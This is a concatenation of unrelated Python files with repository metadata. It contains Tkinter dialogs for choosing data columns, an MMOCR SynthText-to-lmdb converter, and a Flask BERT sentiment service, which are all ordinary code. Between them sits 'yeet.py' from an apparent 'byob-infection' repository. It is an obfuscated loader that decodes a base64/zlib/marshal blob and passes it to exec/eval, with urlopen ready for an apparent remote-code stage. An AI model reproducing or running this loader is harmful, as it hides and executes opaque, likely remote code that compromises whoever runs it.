        tk.Toplevel.__init__(self, parent)
        # keep the dialog on top of (and minimized with) its parent
        self.transient(parent)
        if title:
            self.title(title)
        self.parent = parent
        self.result = None
        body = tk.Frame(self)
        # body() returns the widget that should receive initial focus
        self.initial_focus = self.body(body)
        body.pack(padx=5, pady=5)
        self.buttonbox()
        # route all input to this dialog (modal behavior)
        self.grab_set()
        if not self.initial_focus:
            self.initial_focus = self
        # treat the window-manager close button as Cancel
        self.protocol("WM_DELETE_WINDOW", self.cancel)
        # place the dialog slightly offset from the parent's corner
        self.geometry("+%d+%d" % (parent.winfo_rootx()+50,
                                  parent.winfo_rooty()+50))
        self.initial_focus.focus_set()
        # block here until the dialog is destroyed
        self.wait_window(self)
    #
    # construction hooks
    def body(self, master):
        # create dialog body. return widget that should have
        # initial focus. this method should be overridden
        pass
    def buttonbox(self):
        # add standard button box. override if you don't want the
        # standard buttons
        box = tk.Frame(self)
        w = tk.Button(box, text="OK", width=10, command=self.ok, default=tk.ACTIVE)
        w.pack(side=tk.LEFT, padx=5, pady=5)
        w = tk.Button(box, text="Cancel", width=10, command=self.cancel)
        w.pack(side=tk.LEFT, padx=5, pady=5)
        # keyboard shortcuts: Return = OK, Escape = Cancel
        self.bind("<Return>", self.ok)
        self.bind("<Escape>", self.cancel)
        box.pack()
    #
    # standard button semantics
    def ok(self, event=None):
        """OK handler: validate, then apply results and close."""
        if not self.validate():
            self.initial_focus.focus_set() # put focus back
            return
        self.withdraw()
        self.update_idletasks()
        self.apply()
        self.cancel()
    def cancel(self, event=None):
        """Dismiss the dialog and return focus to the parent window."""
        # put focus back to the parent window
        self.parent.focus_set()
        self.destroy()
    #
    # command hooks
    def validate(self):
        """Return 1 if the dialog contents are acceptable; override to check."""
        return 1 # override
    def apply(self):
        """Process the dialog's data on OK; override in subclasses."""
        pass # override
class EntryBox(Dialog):
    """Dialog for picking plot columns: x, y, optional z, color and size.

    After the dialog closes, getdataCols() returns the selected headers
    in the order [x, y, z, color, size]; z/color/size are None when not
    chosen.  userCancelled() reports whether the user dismissed the
    dialog without pressing OK.
    """
    def __init__(self, parent, dataObject, title = None):
        """Set up selection state, then open the (blocking) modal dialog.

        parent     -- parent window
        dataObject -- data source; must provide get_headers()
        title      -- optional window title
        """
        self.minimum = 1
        self.maximum = 10
        # True until apply() runs (i.e. until the user presses OK).
        # BUGFIX: previously this was never cleared, so userCancelled()
        # always reported a cancel even after OK.
        self.hitCancel = True
        self.x = None
        self.y = None
        self.z = None
        self.colorOption = "Black"
        self.sizeOption = 10
        self.data = dataObject
        self.headers = self.data.get_headers()
        self.dataCols = []
        self.colorMenu = None
        self.xMenu = None
        self.yMenu = None
        self.zMenu = None
        self.sizeMenu = None
        self.colors = ["black", "blue", "red", "green"]
        self.sizes = ["5", "10", "15", "20", "25"]
        # BUGFIX: forward the caller-supplied title (it was dropped before)
        Dialog.__init__(self, parent, title)
    def body(self, master):
        """Build the five single-select listboxes (x/y/z, size, color)."""
        frame = tk.Frame(self)
        frame2 = tk.Frame(self)
        frame.pack(side=tk.LEFT)
        xLabel = tk.Label(frame, text="X", width=20)
        yLabel = tk.Label(frame, text="Y", width=20)
        zLabel = tk.Label(frame, text="Z", width=20)
        sizeLabel = tk.Label(frame2, text="Size", width=20)
        colorLabel = tk.Label(frame2, text="Color", width=20)
        # exportselection=0 lets each listbox keep its own selection
        self.colorMenu = tk.Listbox( frame2, selectmode=tk.SINGLE, exportselection=0)
        self.xMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
        self.yMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
        self.zMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
        self.sizeMenu = tk.Listbox( frame2, selectmode=tk.SINGLE, exportselection=0)
        xLabel.pack(side=tk.TOP, pady=5)
        self.xMenu.pack(side=tk.TOP, padx=5)
        yLabel.pack(side=tk.TOP, pady=5)
        self.yMenu.pack(side=tk.TOP, padx=5)
        zLabel.pack(side=tk.TOP, pady=5)
        self.zMenu.pack(side=tk.TOP, padx=5)
        frame2.pack(side=tk.RIGHT)
        sizeLabel.pack(side=tk.TOP, pady=5)
        self.sizeMenu.pack(side=tk.TOP, padx=5)
        colorLabel.pack(side=tk.TOP, pady=5)
        self.colorMenu.pack(side=tk.TOP, padx=5)
        # every listbox offers the data headers as choices
        for header in self.headers:
            self.xMenu.insert(tk.END, header)
            self.yMenu.insert(tk.END, header)
            self.zMenu.insert(tk.END, header)
            self.colorMenu.insert(tk.END, header)
            self.sizeMenu.insert(tk.END, header)
    def apply(self):
        """Record the selections on OK.

        x and y are appended only when selected (callers treat them as
        required); z, color and size append None when left unselected so
        dataCols keeps a fixed layout after the first two entries.
        """
        self.hitCancel = False  # the user confirmed with OK
        xSelection = self.xMenu.curselection()
        if len(xSelection) > 0:
            self.dataCols.append(self.headers[xSelection[0]])
        ySelection = self.yMenu.curselection()
        if len(ySelection) > 0:
            self.dataCols.append(self.headers[ySelection[0]])
        zSelection = self.zMenu.curselection()
        if len(zSelection) > 0:
            self.dataCols.append(self.headers[zSelection[0]])
        else:
            self.dataCols.append(None)
        colorSelection = self.colorMenu.curselection()
        if len(colorSelection) > 0:
            self.dataCols.append(self.headers[colorSelection[0]])
        else:
            self.dataCols.append(None)
        sizeSelection = self.sizeMenu.curselection()
        if len(sizeSelection) > 0:
            self.dataCols.append(self.headers[sizeSelection[0]])
        else:
            self.dataCols.append(None)
    def getdataCols(self):
        """Return the chosen headers [x, y, z, color, size]."""
        return self.dataCols
    # returns number of points
    def getX(self):
        return self.x
    def getY(self):
        return self.y
    def getZ(self):
        return self.z
    def getColor(self):
        return self.colorOption
    def getSize(self):
        return self.sizeOption
    # tells whether user hit cancel button
    def userCancelled(self):
        """Return True if the dialog was dismissed without pressing OK."""
        # preserved side effect of the original implementation
        self.numPoints = 100
        return self.hitCancel
class LinRegEntry(Dialog):
    """Dialog for picking the two columns (x, y) of a linear regression.

    After the dialog closes, getdataCols() returns the selected headers
    as [x, y]; userCancelled() reports whether the user dismissed the
    dialog without pressing OK.
    """
    def __init__(self, parent, dataObject, title = None):
        """Set up selection state, then open the (blocking) modal dialog.

        parent     -- parent window
        dataObject -- data source; must provide get_headers()
        title      -- optional window title
        """
        self.minimum = 1
        self.maximum = 10
        # True until apply() runs (i.e. until the user presses OK).
        # BUGFIX: previously this was never cleared, so userCancelled()
        # always reported a cancel even after OK.
        self.hitCancel = True
        self.x = None
        self.y = None
        self.colorOption = "Black"
        self.sizeOption = 10
        self.data = dataObject
        self.headers = self.data.get_headers()
        self.dataCols = []
        # kept for interface parity with EntryBox, unused by this dialog
        self.colorMenu = None
        self.xMenu = None
        self.yMenu = None
        self.sizeMenu = None
        self.colors = ["black", "blue", "red", "green"]
        self.sizes = ["5", "10", "15", "20", "25"]
        # BUGFIX: forward the caller-supplied title (it was dropped before)
        Dialog.__init__(self, parent, title)
    def body(self, master):
        """Build the two single-select listboxes for x and y."""
        frame = tk.Frame(self)
        frame2 = tk.Frame(self)
        frame.pack(side=tk.LEFT)
        xLabel = tk.Label(frame, text="X", width=20)
        yLabel = tk.Label(frame, text="Y", width=20)
        # exportselection=0 lets each listbox keep its own selection
        self.xMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
        self.yMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
        xLabel.pack(side=tk.TOP, pady=5)
        self.xMenu.pack(side=tk.TOP, padx=5)
        yLabel.pack(side=tk.TOP, pady=5)
        self.yMenu.pack(side=tk.TOP, padx=5)
        for header in self.headers:
            self.xMenu.insert(tk.END, header)
            self.yMenu.insert(tk.END, header)
    def apply(self):
        """Record the x/y selections on OK (appended only when chosen)."""
        self.hitCancel = False  # the user confirmed with OK
        xSelection = self.xMenu.curselection()
        if len(xSelection) > 0:
            self.dataCols.append(self.headers[xSelection[0]])
        ySelection = self.yMenu.curselection()
        if len(ySelection) > 0:
            self.dataCols.append(self.headers[ySelection[0]])
    def getdataCols(self):
        """Return the chosen headers [x, y]."""
        return self.dataCols
    # returns number of points
    def getX(self):
        return self.x
    def getY(self):
        return self.y
    def getColor(self):
        return self.colorOption
    def getSize(self):
        return self.sizeOption
    # tells whether user hit cancel button
    def userCancelled(self):
        """Return True if the dialog was dismissed without pressing OK."""
        # preserved side effect of the original implementation
        self.numPoints = 100
        return self.hitCancel
class PCAdialog(Dialog):
    """Modal dialog for choosing which columns feed a PCA analysis."""
    def __init__(self, parent, dataObject, title = None):
        self.data = dataObject
        self.headers = self.data.get_headers()
        # Filled by apply() with every header the user highlighted.
        self.dataCols = []
        Dialog.__init__(self, parent)
    def body(self, master):
        """Build a multi-selection listbox populated with the data headers."""
        frame = tk.Frame(self)
        # NOTE(review): frame2 is created but never used.
        frame2 = tk.Frame(self)
        frame.pack(side=tk.LEFT)
        label = tk.Label(frame, text="Choose Headers for PCA Analysis", width=30)
        self.headerList = tk.Listbox( frame, selectmode=tk.MULTIPLE, exportselection=0)
        label.pack(side=tk.TOP, pady=5)
        self.headerList.pack(side=tk.TOP, padx=5)
        for header in self.headers:
            self.headerList.insert(tk.END, header)
    def apply(self):
        """Store the highlighted headers (called when the user confirms)."""
        selection = self.headerList.curselection()
        if len(selection) > 0:
            for item in selection:
                self.dataCols.append(self.headers[item])
    def getdataCols(self):
        """Return the list of headers chosen for the analysis."""
        return self.dataCols
class PCAtable(Dialog):
    """Dialog that renders a grid of PCA results: eigenvectors, eigenvalues
    and the cumulative explained fraction, one row per principal component."""
    def __init__(self, parent, dataObject, title = None):
        self.data = dataObject
        self.headers = self.data.get_headers()
        self.pcadata = self.data.get_specific_col_data(self.headers)
        self.evec = self.data.get_eigenvectors()
        self.eval = self.data.get_eigenvalues()
        # Running total of eigenvalue / sum(eigenvalues): the cumulative
        # fraction of variance explained by the first k components.
        evalsum = np.sum(self.eval)
        counter = 0
        self.cumulativeList = []
        for item in self.eval:
            temp = item/evalsum
            counter = counter + temp
            self.cumulativeList.append(counter)
        Dialog.__init__(self, parent)
    def body(self, master):
        """Lay out the results table with tk.Label widgets on a grid."""
        # NOTE(review): the prints below are debug output left in place.
        print("**********")
        print(self.evec)
        print("*****-------*****")
        print(self.eval)
        print(self.data.get_original_headers())
        # length = self.evec.shape[0]
        # NOTE(review): length and width are computed but never used.
        length = self.data.get_num_points()
        width = self.evec.shape[0]+1
        standardLabels = ["E-vec", "E-val", "Cumulative"]
        topLabels = standardLabels + self.data.get_original_headers()
        for i in range(self.evec.shape[0]): #Rows
            # Row header: the PCA output column name.
            c = tk.Label(master, text="%s" % (self.headers[i]))
            c.grid(row=i+1,column=0)
            # val = tk.Label(master, text="%f" % (self.eval.item((i, j))))
            for j in range(len(topLabels)): #Columns
                label = tk.Label(master, text="%s" % (topLabels[j]))
                # Columns 3+ hold the eigenvector components (offset by the
                # three standard label columns).
                if j > 2:
                    b = tk.Label(master, text="%f" % (self.evec.item((i, j-3))))
                    b.grid(row=i+1, column=j)
                label.grid(row=0, column=j)
            vals = tk.Label(master, text="%f" % (self.eval.item((i))))
            vals.grid(row=i+1, column=1)
            cumulative = tk.Label(master, text="%f" % (self.cumulativeList[i]))
            cumulative.grid(row=i+1, column=2)
class PCAdialogPlot(Dialog):
    """Modal dialog for mapping PCA columns to plot axes (X, Y, Z) plus
    optional color and size channels.

    apply() records selections in fixed order [x, y, z, color, size]; the
    last three are padded with None when left unselected.
    """
    def __init__(self, parent, dataObject, title = None):
        self.data = dataObject
        self.headers = self.data.get_headers()
        self.dataCols = []
        Dialog.__init__(self, parent)
    def body(self, master):
        """Build five single-selection listboxes, all listing the headers."""
        frame = tk.Frame(self)
        frame2 = tk.Frame(self)
        frame.pack(side=tk.LEFT)
        xLabel = tk.Label(frame, text="X", width=20)
        yLabel = tk.Label(frame, text="Y", width=20)
        zLabel = tk.Label(frame, text="Z", width=20)
        sizeLabel = tk.Label(frame2, text="Size", width=20)
        colorLabel = tk.Label(frame2, text="Color", width=20)
        self.colorMenu = tk.Listbox( frame2, selectmode=tk.SINGLE, exportselection=0)
        self.xMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
        self.yMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
        self.zMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
        self.sizeMenu = tk.Listbox( frame2, selectmode=tk.SINGLE, exportselection=0)
        xLabel.pack(side=tk.TOP, pady=5)
        self.xMenu.pack(side=tk.TOP, padx=5)
        yLabel.pack(side=tk.TOP, pady=5)
        self.yMenu.pack(side=tk.TOP, padx=5)
        zLabel.pack(side=tk.TOP, pady=5)
        self.zMenu.pack(side=tk.TOP, padx=5)
        frame2.pack(side=tk.RIGHT)
        sizeLabel.pack(side=tk.TOP, pady=5)
        self.sizeMenu.pack(side=tk.TOP, padx=5)
        colorLabel.pack(side=tk.TOP, pady=5)
        self.colorMenu.pack(side=tk.TOP, padx=5)
        #color options
        # for color in self.colors:
        #     self.colorMenu.insert(tk.END, color)
        # for size in self.sizes:
        #     self.sizeMenu.insert(tk.END, size)
        for header in self.headers:
            self.xMenu.insert(tk.END, header)
            self.yMenu.insert(tk.END, header)
            self.zMenu.insert(tk.END, header)
            self.colorMenu.insert(tk.END, header)
            self.sizeMenu.insert(tk.END, header)
    def apply(self):
        """Record selections as [x, y, z, color, size]; None for unset
        optional channels. Note x/y have no None fallback."""
        xSelection = self.xMenu.curselection()
        if len(xSelection) > 0:
            self.dataCols.append(self.headers[xSelection[0]])
        ySelection = self.yMenu.curselection()
        if len(ySelection) > 0:
            self.dataCols.append(self.headers[ySelection[0]])
        zSelection = self.zMenu.curselection()
        if len(zSelection) > 0:
            self.dataCols.append(self.headers[zSelection[0]])
        else:
            self.dataCols.append(None)
        colorSelection = self.colorMenu.curselection()
        if len(colorSelection) > 0:
            self.dataCols.append(self.headers[colorSelection[0]])
        else:
            self.dataCols.append(None)
        sizeSelection = self.sizeMenu.curselection()
        if len(sizeSelection) > 0:
            self.dataCols.append(self.headers[sizeSelection[0]])
        else:
            self.dataCols.append(None)
    def getdataCols(self):
        """Return the ordered selections recorded by apply()."""
        return self.dataCols
class ClusterDialog(Dialog):
    """Modal dialog for choosing clustering columns and a cluster count."""
    def __init__(self, parent, dataObject, title = None):
        self.data = dataObject
        self.headers = self.data.get_headers()
        self.dataCols = []
        self.numClusters = 0
        Dialog.__init__(self, parent)
    def body(self, master):
        """Build a multi-select header listbox plus a cluster-count entry."""
        frame = tk.Frame(self)
        # NOTE(review): frame2 is created but never used.
        frame2 = tk.Frame(self)
        frame.pack(side=tk.LEFT)
        label = tk.Label(frame, text="Choose Headers for Cluster Analysis", width=30)
        self.headerList = tk.Listbox( frame, selectmode=tk.MULTIPLE, exportselection=0)
        label.pack(side=tk.TOP, pady=5)
        self.headerList.pack(side=tk.TOP, padx=5)
        for header in self.headers:
            self.headerList.insert(tk.END, header)
        tk.Label(frame, text="How Many Clusters Do You Want?", width=30).pack(side=tk.TOP, pady=5)
        self.numClustersEntry = tk.Entry(frame)
        self.numClustersEntry.pack(side=tk.TOP, pady=5)
    def apply(self):
        """Store the highlighted headers and the requested cluster count."""
        selection = self.headerList.curselection()
        if len(selection) > 0:
            for item in selection:
                self.dataCols.append(self.headers[item])
        if self.numClustersEntry != None:
            # NOTE(review): Entry.get() returns a string, so numClusters
            # becomes a str here (its default is int 0) -- confirm callers
            # convert before arithmetic.
            self.numClusters = self.numClustersEntry.get()
    def getdataCols(self):
        """Return the headers chosen for clustering."""
        return self.dataCols
    def getNumClusters(self):
        """Return the requested cluster count (str after apply())."""
        return self.numClusters
class ClusterDialogPlot(Dialog):
    """Modal dialog for mapping cluster-analysis columns to plot axes
    (X, Y, Z) plus optional color and size channels.

    Same layout as PCAdialogPlot, but it lists the ORIGINAL data headers
    (data.get_original_headers()).
    """
    def __init__(self, parent, dataObject, title = None):
        self.data = dataObject
        self.headers = self.data.get_original_headers()
        self.dataCols = []
        Dialog.__init__(self, parent)
    def body(self, master):
        """Build five single-selection listboxes, all listing the headers."""
        frame = tk.Frame(self)
        frame2 = tk.Frame(self)
        frame.pack(side=tk.LEFT)
        xLabel = tk.Label(frame, text="X", width=20)
        yLabel = tk.Label(frame, text="Y", width=20)
        zLabel = tk.Label(frame, text="Z", width=20)
        sizeLabel = tk.Label(frame2, text="Size", width=20)
        colorLabel = tk.Label(frame2, text="Color", width=20)
        self.colorMenu = tk.Listbox( frame2, selectmode=tk.SINGLE, exportselection=0)
        self.xMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
        self.yMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
        self.zMenu = tk.Listbox( frame, selectmode=tk.SINGLE, exportselection=0)
        self.sizeMenu = tk.Listbox( frame2, selectmode=tk.SINGLE, exportselection=0)
        xLabel.pack(side=tk.TOP, pady=5)
        self.xMenu.pack(side=tk.TOP, padx=5)
        yLabel.pack(side=tk.TOP, pady=5)
        self.yMenu.pack(side=tk.TOP, padx=5)
        zLabel.pack(side=tk.TOP, pady=5)
        self.zMenu.pack(side=tk.TOP, padx=5)
        frame2.pack(side=tk.RIGHT)
        sizeLabel.pack(side=tk.TOP, pady=5)
        self.sizeMenu.pack(side=tk.TOP, padx=5)
        colorLabel.pack(side=tk.TOP, pady=5)
        self.colorMenu.pack(side=tk.TOP, padx=5)
        #color options
        # for color in self.colors:
        #     self.colorMenu.insert(tk.END, color)
        # for size in self.sizes:
        #     self.sizeMenu.insert(tk.END, size)
        for header in self.headers:
            self.xMenu.insert(tk.END, header)
            self.yMenu.insert(tk.END, header)
            self.zMenu.insert(tk.END, header)
            self.colorMenu.insert(tk.END, header)
            self.sizeMenu.insert(tk.END, header)
    def apply(self):
        """Record selections as [x, y, z, color, size]; None for unset
        optional channels. Note x/y have no None fallback."""
        xSelection = self.xMenu.curselection()
        if len(xSelection) > 0:
            self.dataCols.append(self.headers[xSelection[0]])
        ySelection = self.yMenu.curselection()
        if len(ySelection) > 0:
            self.dataCols.append(self.headers[ySelection[0]])
        zSelection = self.zMenu.curselection()
        if len(zSelection) > 0:
            self.dataCols.append(self.headers[zSelection[0]])
        else:
            self.dataCols.append(None)
        colorSelection = self.colorMenu.curselection()
        if len(colorSelection) > 0:
            self.dataCols.append(self.headers[colorSelection[0]])
        else:
            self.dataCols.append(None)
        sizeSelection = self.sizeMenu.curselection()
        if len(sizeSelection) > 0:
            self.dataCols.append(self.headers[sizeSelection[0]])
        else:
            self.dataCols.append(None)
    def getdataCols(self):
        """Return the ordered selections recorded by apply()."""
        return self.dataCols
"noreply@github.com"
] | eodecker.noreply@github.com |
e56c6ee27ab0950e3e1ce80a00944ec4b2b72b66 | dd137d2643ec983c60fc0e6c7c6e4d53778c6f92 | /yeet.py | 7f28ec17b139efd2653441120449f0871bec88f0 | [] | no_license | Dybe66/byob-infection | c2b98b3ce9a496712fb54f97902c1c5aa455b80b | 5e8354d5dd39eb57bd6d84b2dd72cc31a983aa15 | refs/heads/main | 2023-08-25T12:07:18.646529 | 2021-10-15T20:32:18 | 2021-10-15T20:32:18 | 417,626,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | import sys,zlib,base64,marshal,json,urllib
# SECURITY WARNING: this script is a loader for an obfuscated payload
# (base64 -> zlib -> marshal -> eval -> exec). The decoded stage is opaque
# here, but the urlopen alias below strongly suggests it fetches and runs
# remote code -- do NOT execute this file.
if sys.version_info[0] > 2:
    from urllib import request
# Python 2/3 compatible urlopen, presumably used by the decoded payload.
urlopen = urllib.request.urlopen if sys.version_info[0] > 2 else urllib.urlopen
# Decode and execute the embedded marshalled stage.
exec(eval(marshal.loads(zlib.decompress(base64.b64decode(b'eJwrtWJgYCgtyskvSM3TUM8oKSmw0te3MNEzMjHXMzHVszS0MjQ2ttDXLy5JTE8tKtbPNzfSK6hU19QrSk1M0dAEAC22Eas=')))))
| [
"noreply@github.com"
] | Dybe66.noreply@github.com |
184bfebb357383b520e0be4fda111faf8a4b9ffa | e4fcd551a9d83e37a2cd6d5a2b53a3cc397ccb10 | /codes/eval_metrics/writing/mmocr/tools/dataset_converters/textdet/synthtext_converter.py | 811b1cc0e669b8dd185dbcf8156595002713a850 | [
"Apache-2.0"
] | permissive | eslambakr/HRS_benchmark | 20f32458a47c6e1032285b44e70cf041a64f842c | 9f153d8c71d1119e4b5c926b899bb556a6eb8a59 | refs/heads/main | 2023-08-08T11:57:26.094578 | 2023-07-22T12:24:51 | 2023-07-22T12:24:51 | 597,550,499 | 33 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,177 | py | # Copyright (c) OpenMMLab. All rights reserved.
import argparse
import json
import os.path as osp
import time
import lmdb
import mmcv
import mmengine
import numpy as np
from scipy.io import loadmat
from shapely.geometry import Polygon
from mmocr.utils import check_argument
def trace_boundary(char_boxes):
    """Trace the boundary point of text.

    Args:
        char_boxes (list[ndarray]): The char boxes for one text. Each element
            is 4x2 ndarray ordered top-left, top-right, bottom-right,
            bottom-left.

    Returns:
        boundary (ndarray): The boundary point sets with size nx2 (int).
    """
    # Validate inline with plain asserts, consistent with
    # match_bbox_char_str, instead of the check_argument helper.
    assert isinstance(char_boxes, list)
    assert all(isinstance(box, np.ndarray) for box in char_boxes)
    # Walk the top edge left to right (points 0-1 of each box) ...
    p_top = [box[0:2] for box in char_boxes]
    # ... then the bottom edge right to left (points 2-3, boxes reversed),
    # producing a closed clockwise outline.
    p_bottom = [box[[2, 3], :] for box in reversed(char_boxes)]
    boundary = np.concatenate(p_top + p_bottom).astype(int)
    return boundary
def match_bbox_char_str(bboxes, char_bboxes, strs):
    """match the bboxes, char bboxes, and strs.

    Args:
        bboxes (ndarray): The text boxes of size (2, 4, num_box).
        char_bboxes (ndarray): The char boxes of size (2, 4, num_char_box).
        strs (ndarray): The string of size (num_strs,)

    Returns:
        tuple: six parallel lists, one entry per word box:
            (poly_list, poly_box_list, poly_boundary_list,
             poly_charbox_list, poly_char_idx_list, poly_char_list).
    """
    assert isinstance(bboxes, np.ndarray)
    assert isinstance(char_bboxes, np.ndarray)
    assert isinstance(strs, np.ndarray)
    bboxes = bboxes.astype(np.int32)
    char_bboxes = char_bboxes.astype(np.int32)
    # A single box arrives as (2, 4); add the trailing box axis so the
    # transpose below always yields (num_box, 4, 2).
    if len(char_bboxes.shape) == 2:
        char_bboxes = np.expand_dims(char_bboxes, axis=2)
    char_bboxes = np.transpose(char_bboxes, (2, 1, 0))
    if len(bboxes.shape) == 2:
        bboxes = np.expand_dims(bboxes, axis=2)
    bboxes = np.transpose(bboxes, (2, 1, 0))
    # Flattened character stream with whitespace removed; indexed by the
    # cumulative word lengths computed below.
    chars = ''.join(strs).replace('\n', '').replace(' ', '')
    num_boxes = bboxes.shape[0]
    # NOTE(review): `iter` shadows the builtin in these comprehensions.
    poly_list = [Polygon(bboxes[iter]) for iter in range(num_boxes)]
    poly_box_list = [bboxes[iter] for iter in range(num_boxes)]
    poly_char_list = [[] for iter in range(num_boxes)]
    poly_char_idx_list = [[] for iter in range(num_boxes)]
    poly_charbox_list = [[] for iter in range(num_boxes)]
    words = []
    for s in strs:
        words += s.split()
    words_len = [len(w) for w in words]
    # End index (exclusive) of each word in the flattened char stream.
    words_end_inx = np.cumsum(words_len)
    start_inx = 0
    # Assign every character (index, glyph, box) to its owning word.
    for word_inx, end_inx in enumerate(words_end_inx):
        for char_inx in range(start_inx, end_inx):
            poly_char_idx_list[word_inx].append(char_inx)
            poly_char_list[word_inx].append(chars[char_inx])
            poly_charbox_list[word_inx].append(char_bboxes[char_inx])
        start_inx = end_inx
    # Every word box must own at least one character box.
    for box_inx in range(num_boxes):
        assert len(poly_charbox_list[box_inx]) > 0
    poly_boundary_list = []
    for item in poly_charbox_list:
        boundary = np.ndarray((0, 2))
        if len(item) > 0:
            boundary = trace_boundary(item)
        poly_boundary_list.append(boundary)
    return (poly_list, poly_box_list, poly_boundary_list, poly_charbox_list,
            poly_char_idx_list, poly_char_list)
def convert_annotations(root_path, gt_name, lmdb_name):
    """Convert the annotation into lmdb dataset.

    Reads the SynthText .mat ground truth, pairs each image's word/char
    boxes with its text, and writes one COCO-style JSON record per image
    into the lmdb (key = image index, plus a b'total_number' key).

    Args:
        root_path (str): The root path of dataset.
        gt_name (str): The ground truth filename.
        lmdb_name (str): The output lmdb filename.
    """
    assert isinstance(root_path, str)
    assert isinstance(gt_name, str)
    assert isinstance(lmdb_name, str)
    start_time = time.time()
    gt = loadmat(gt_name)
    img_num = len(gt['imnames'][0])
    # 40 GB map size: lmdb requires the maximum DB size up front.
    env = lmdb.open(lmdb_name, map_size=int(1e9 * 40))
    with env.begin(write=True) as txn:
        for img_id in range(img_num):
            # Progress/ETA report every 1000 images.
            if img_id % 1000 == 0 and img_id > 0:
                total_time_sec = time.time() - start_time
                avg_time_sec = total_time_sec / img_id
                eta_mins = (avg_time_sec * (img_num - img_id)) / 60
                print(f'\ncurrent_img/total_imgs {img_id}/{img_num} | '
                      f'eta: {eta_mins:.3f} mins')
            # for each img
            img_file = osp.join(root_path, 'imgs', gt['imnames'][0][img_id][0])
            img = mmcv.imread(img_file, 'unchanged')
            height, width = img.shape[0:2]
            img_json = {}
            img_json['file_name'] = gt['imnames'][0][img_id][0]
            img_json['height'] = height
            img_json['width'] = width
            img_json['annotations'] = []
            wordBB = gt['wordBB'][0][img_id]
            charBB = gt['charBB'][0][img_id]
            txt = gt['txt'][0][img_id]
            poly_list, _, poly_boundary_list, _, _, _ = match_bbox_char_str(
                wordBB, charBB, txt)
            # One annotation per word polygon: xywh bbox + boundary polygon.
            for poly_inx in range(len(poly_list)):
                polygon = poly_list[poly_inx]
                min_x, min_y, max_x, max_y = polygon.bounds
                bbox = [min_x, min_y, max_x - min_x, max_y - min_y]
                anno_info = dict()
                anno_info['iscrowd'] = 0
                anno_info['category_id'] = 1
                anno_info['bbox'] = bbox
                anno_info['segmentation'] = [
                    poly_boundary_list[poly_inx].flatten().tolist()
                ]
                img_json['annotations'].append(anno_info)
            string = json.dumps(img_json)
            txn.put(str(img_id).encode('utf8'), string.encode('utf8'))
        key = b'total_number'
        value = str(img_num).encode('utf8')
        txn.put(key, value)
def parse_args():
    """Parse the command line: a positional SynthText root and an
    optional output directory (-o/--out-dir)."""
    ap = argparse.ArgumentParser(
        description='Convert synthtext to lmdb dataset')
    ap.add_argument('synthtext_path', help='synthetic root path')
    ap.add_argument('-o', '--out-dir', help='output path')
    return ap.parse_args()
# TODO: Refactor synthtext
def main():
    """CLI entry point: convert a SynthText dataset to 'synthtext.lmdb'.

    The output directory defaults to the dataset root when -o is omitted.
    """
    args = parse_args()
    synthtext_path = args.synthtext_path
    out_dir = args.out_dir if args.out_dir else synthtext_path
    mmengine.mkdir_or_exist(out_dir)
    gt_name = osp.join(synthtext_path, 'gt.mat')
    lmdb_name = 'synthtext.lmdb'
    convert_annotations(synthtext_path, gt_name, osp.join(out_dir, lmdb_name))
main()
| [
"islam.bakr.2017@gmail.com"
] | islam.bakr.2017@gmail.com |
b5d2dfcb9f3112ebb0b00df7d97761018ff49903 | 255d4b618480144320a512099de9ce445e7885ee | /flask_serving/app.py | b22d7d50beb902f5c3088025586711e5e990d752 | [] | no_license | hyades910739/Bert-Sentiment-Classifier | 9430ddd3bf4b8cc602e3eed2a2a9cf315f990859 | e5f2725c9eef45638ce4cfbaeccf8eea32f1bacf | refs/heads/master | 2023-02-26T12:00:37.185038 | 2021-01-31T13:40:09 | 2021-01-31T13:40:09 | 334,664,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,687 | py | import flask
from flask import Flask
from flask import render_template, url_for, request
import sys
import time
from pre_process import get_token
import json
from config import BERT_URL, SENTIMENT_URL
from predict import get_sentiment_predict, get_bert_embedding
from crawler import get_raw_pushes_list_from_post, combine_user_push
app = Flask(__name__)
@app.route("/predict", methods=['GET', 'POST'])
def predict():
    """Score posted text lines: tokenize, embed via the BERT service,
    then classify via the sentiment service. Expects JSON with 'lines'."""
    if request.method == 'POST':
        data = request.get_json()
        # NOTE(review): json.loads on get_json()'s result implies clients
        # POST a JSON-encoded *string* (double-encoded) -- confirm; a plain
        # JSON object body would make this loads() fail.
        data = json.loads(data)
        lines = data['lines']
        if not lines:
            return {
                'message': 'no data found. should post a json with lines'
            }
        # Debug output of the incoming lines.
        print(lines)
        token = dict(get_token(lines))
        embedding = get_bert_embedding(BERT_URL, token)
        output = get_sentiment_predict(SENTIMENT_URL, embedding)
        return {'output':output}
    # GET fallback.
    return {
        'message': 'Post nothing.'
    }
@app.route('/predict_ptt',methods=['GET', 'POST'])
def predict_ptt():
    """Crawl a PTT post URL, score each combined user push, and return
    the pushes annotated with their sentiment scores.

    NOTE(review): unlike /predict there is no GET fallback, so a GET
    request makes this view return None -- Flask will raise.
    """
    if request.method == 'POST':
        data = request.get_json()
        # NOTE(review): same double-decode pattern as /predict -- assumes a
        # JSON-encoded string body; confirm against the client.
        data = json.loads(data)
        url = data['url']
        posts = combine_user_push(get_raw_pushes_list_from_post(url))
        # Each post tuple carries its text at index 2.
        contents = [i[2] for i in posts]
        token = dict(get_token(contents))
        embedding = get_bert_embedding(BERT_URL, token)
        output = get_sentiment_predict(SENTIMENT_URL, embedding)
        # Append each score to its originating post tuple.
        line_and_score = [
            content + (score,) for content, score in zip(posts, output)
        ]
        return {'output':line_and_score}
# Run the development server, reachable on all interfaces at port 8938.
# NOTE(review): debug=True must not be used in production.
if __name__ == '__main__':
    app.run(
        host = '0.0.0.0',
        port = 8938,
        debug = True
    )
| [
"ericlai@ericlaideMacBook-Pro.local"
] | ericlai@ericlaideMacBook-Pro.local |
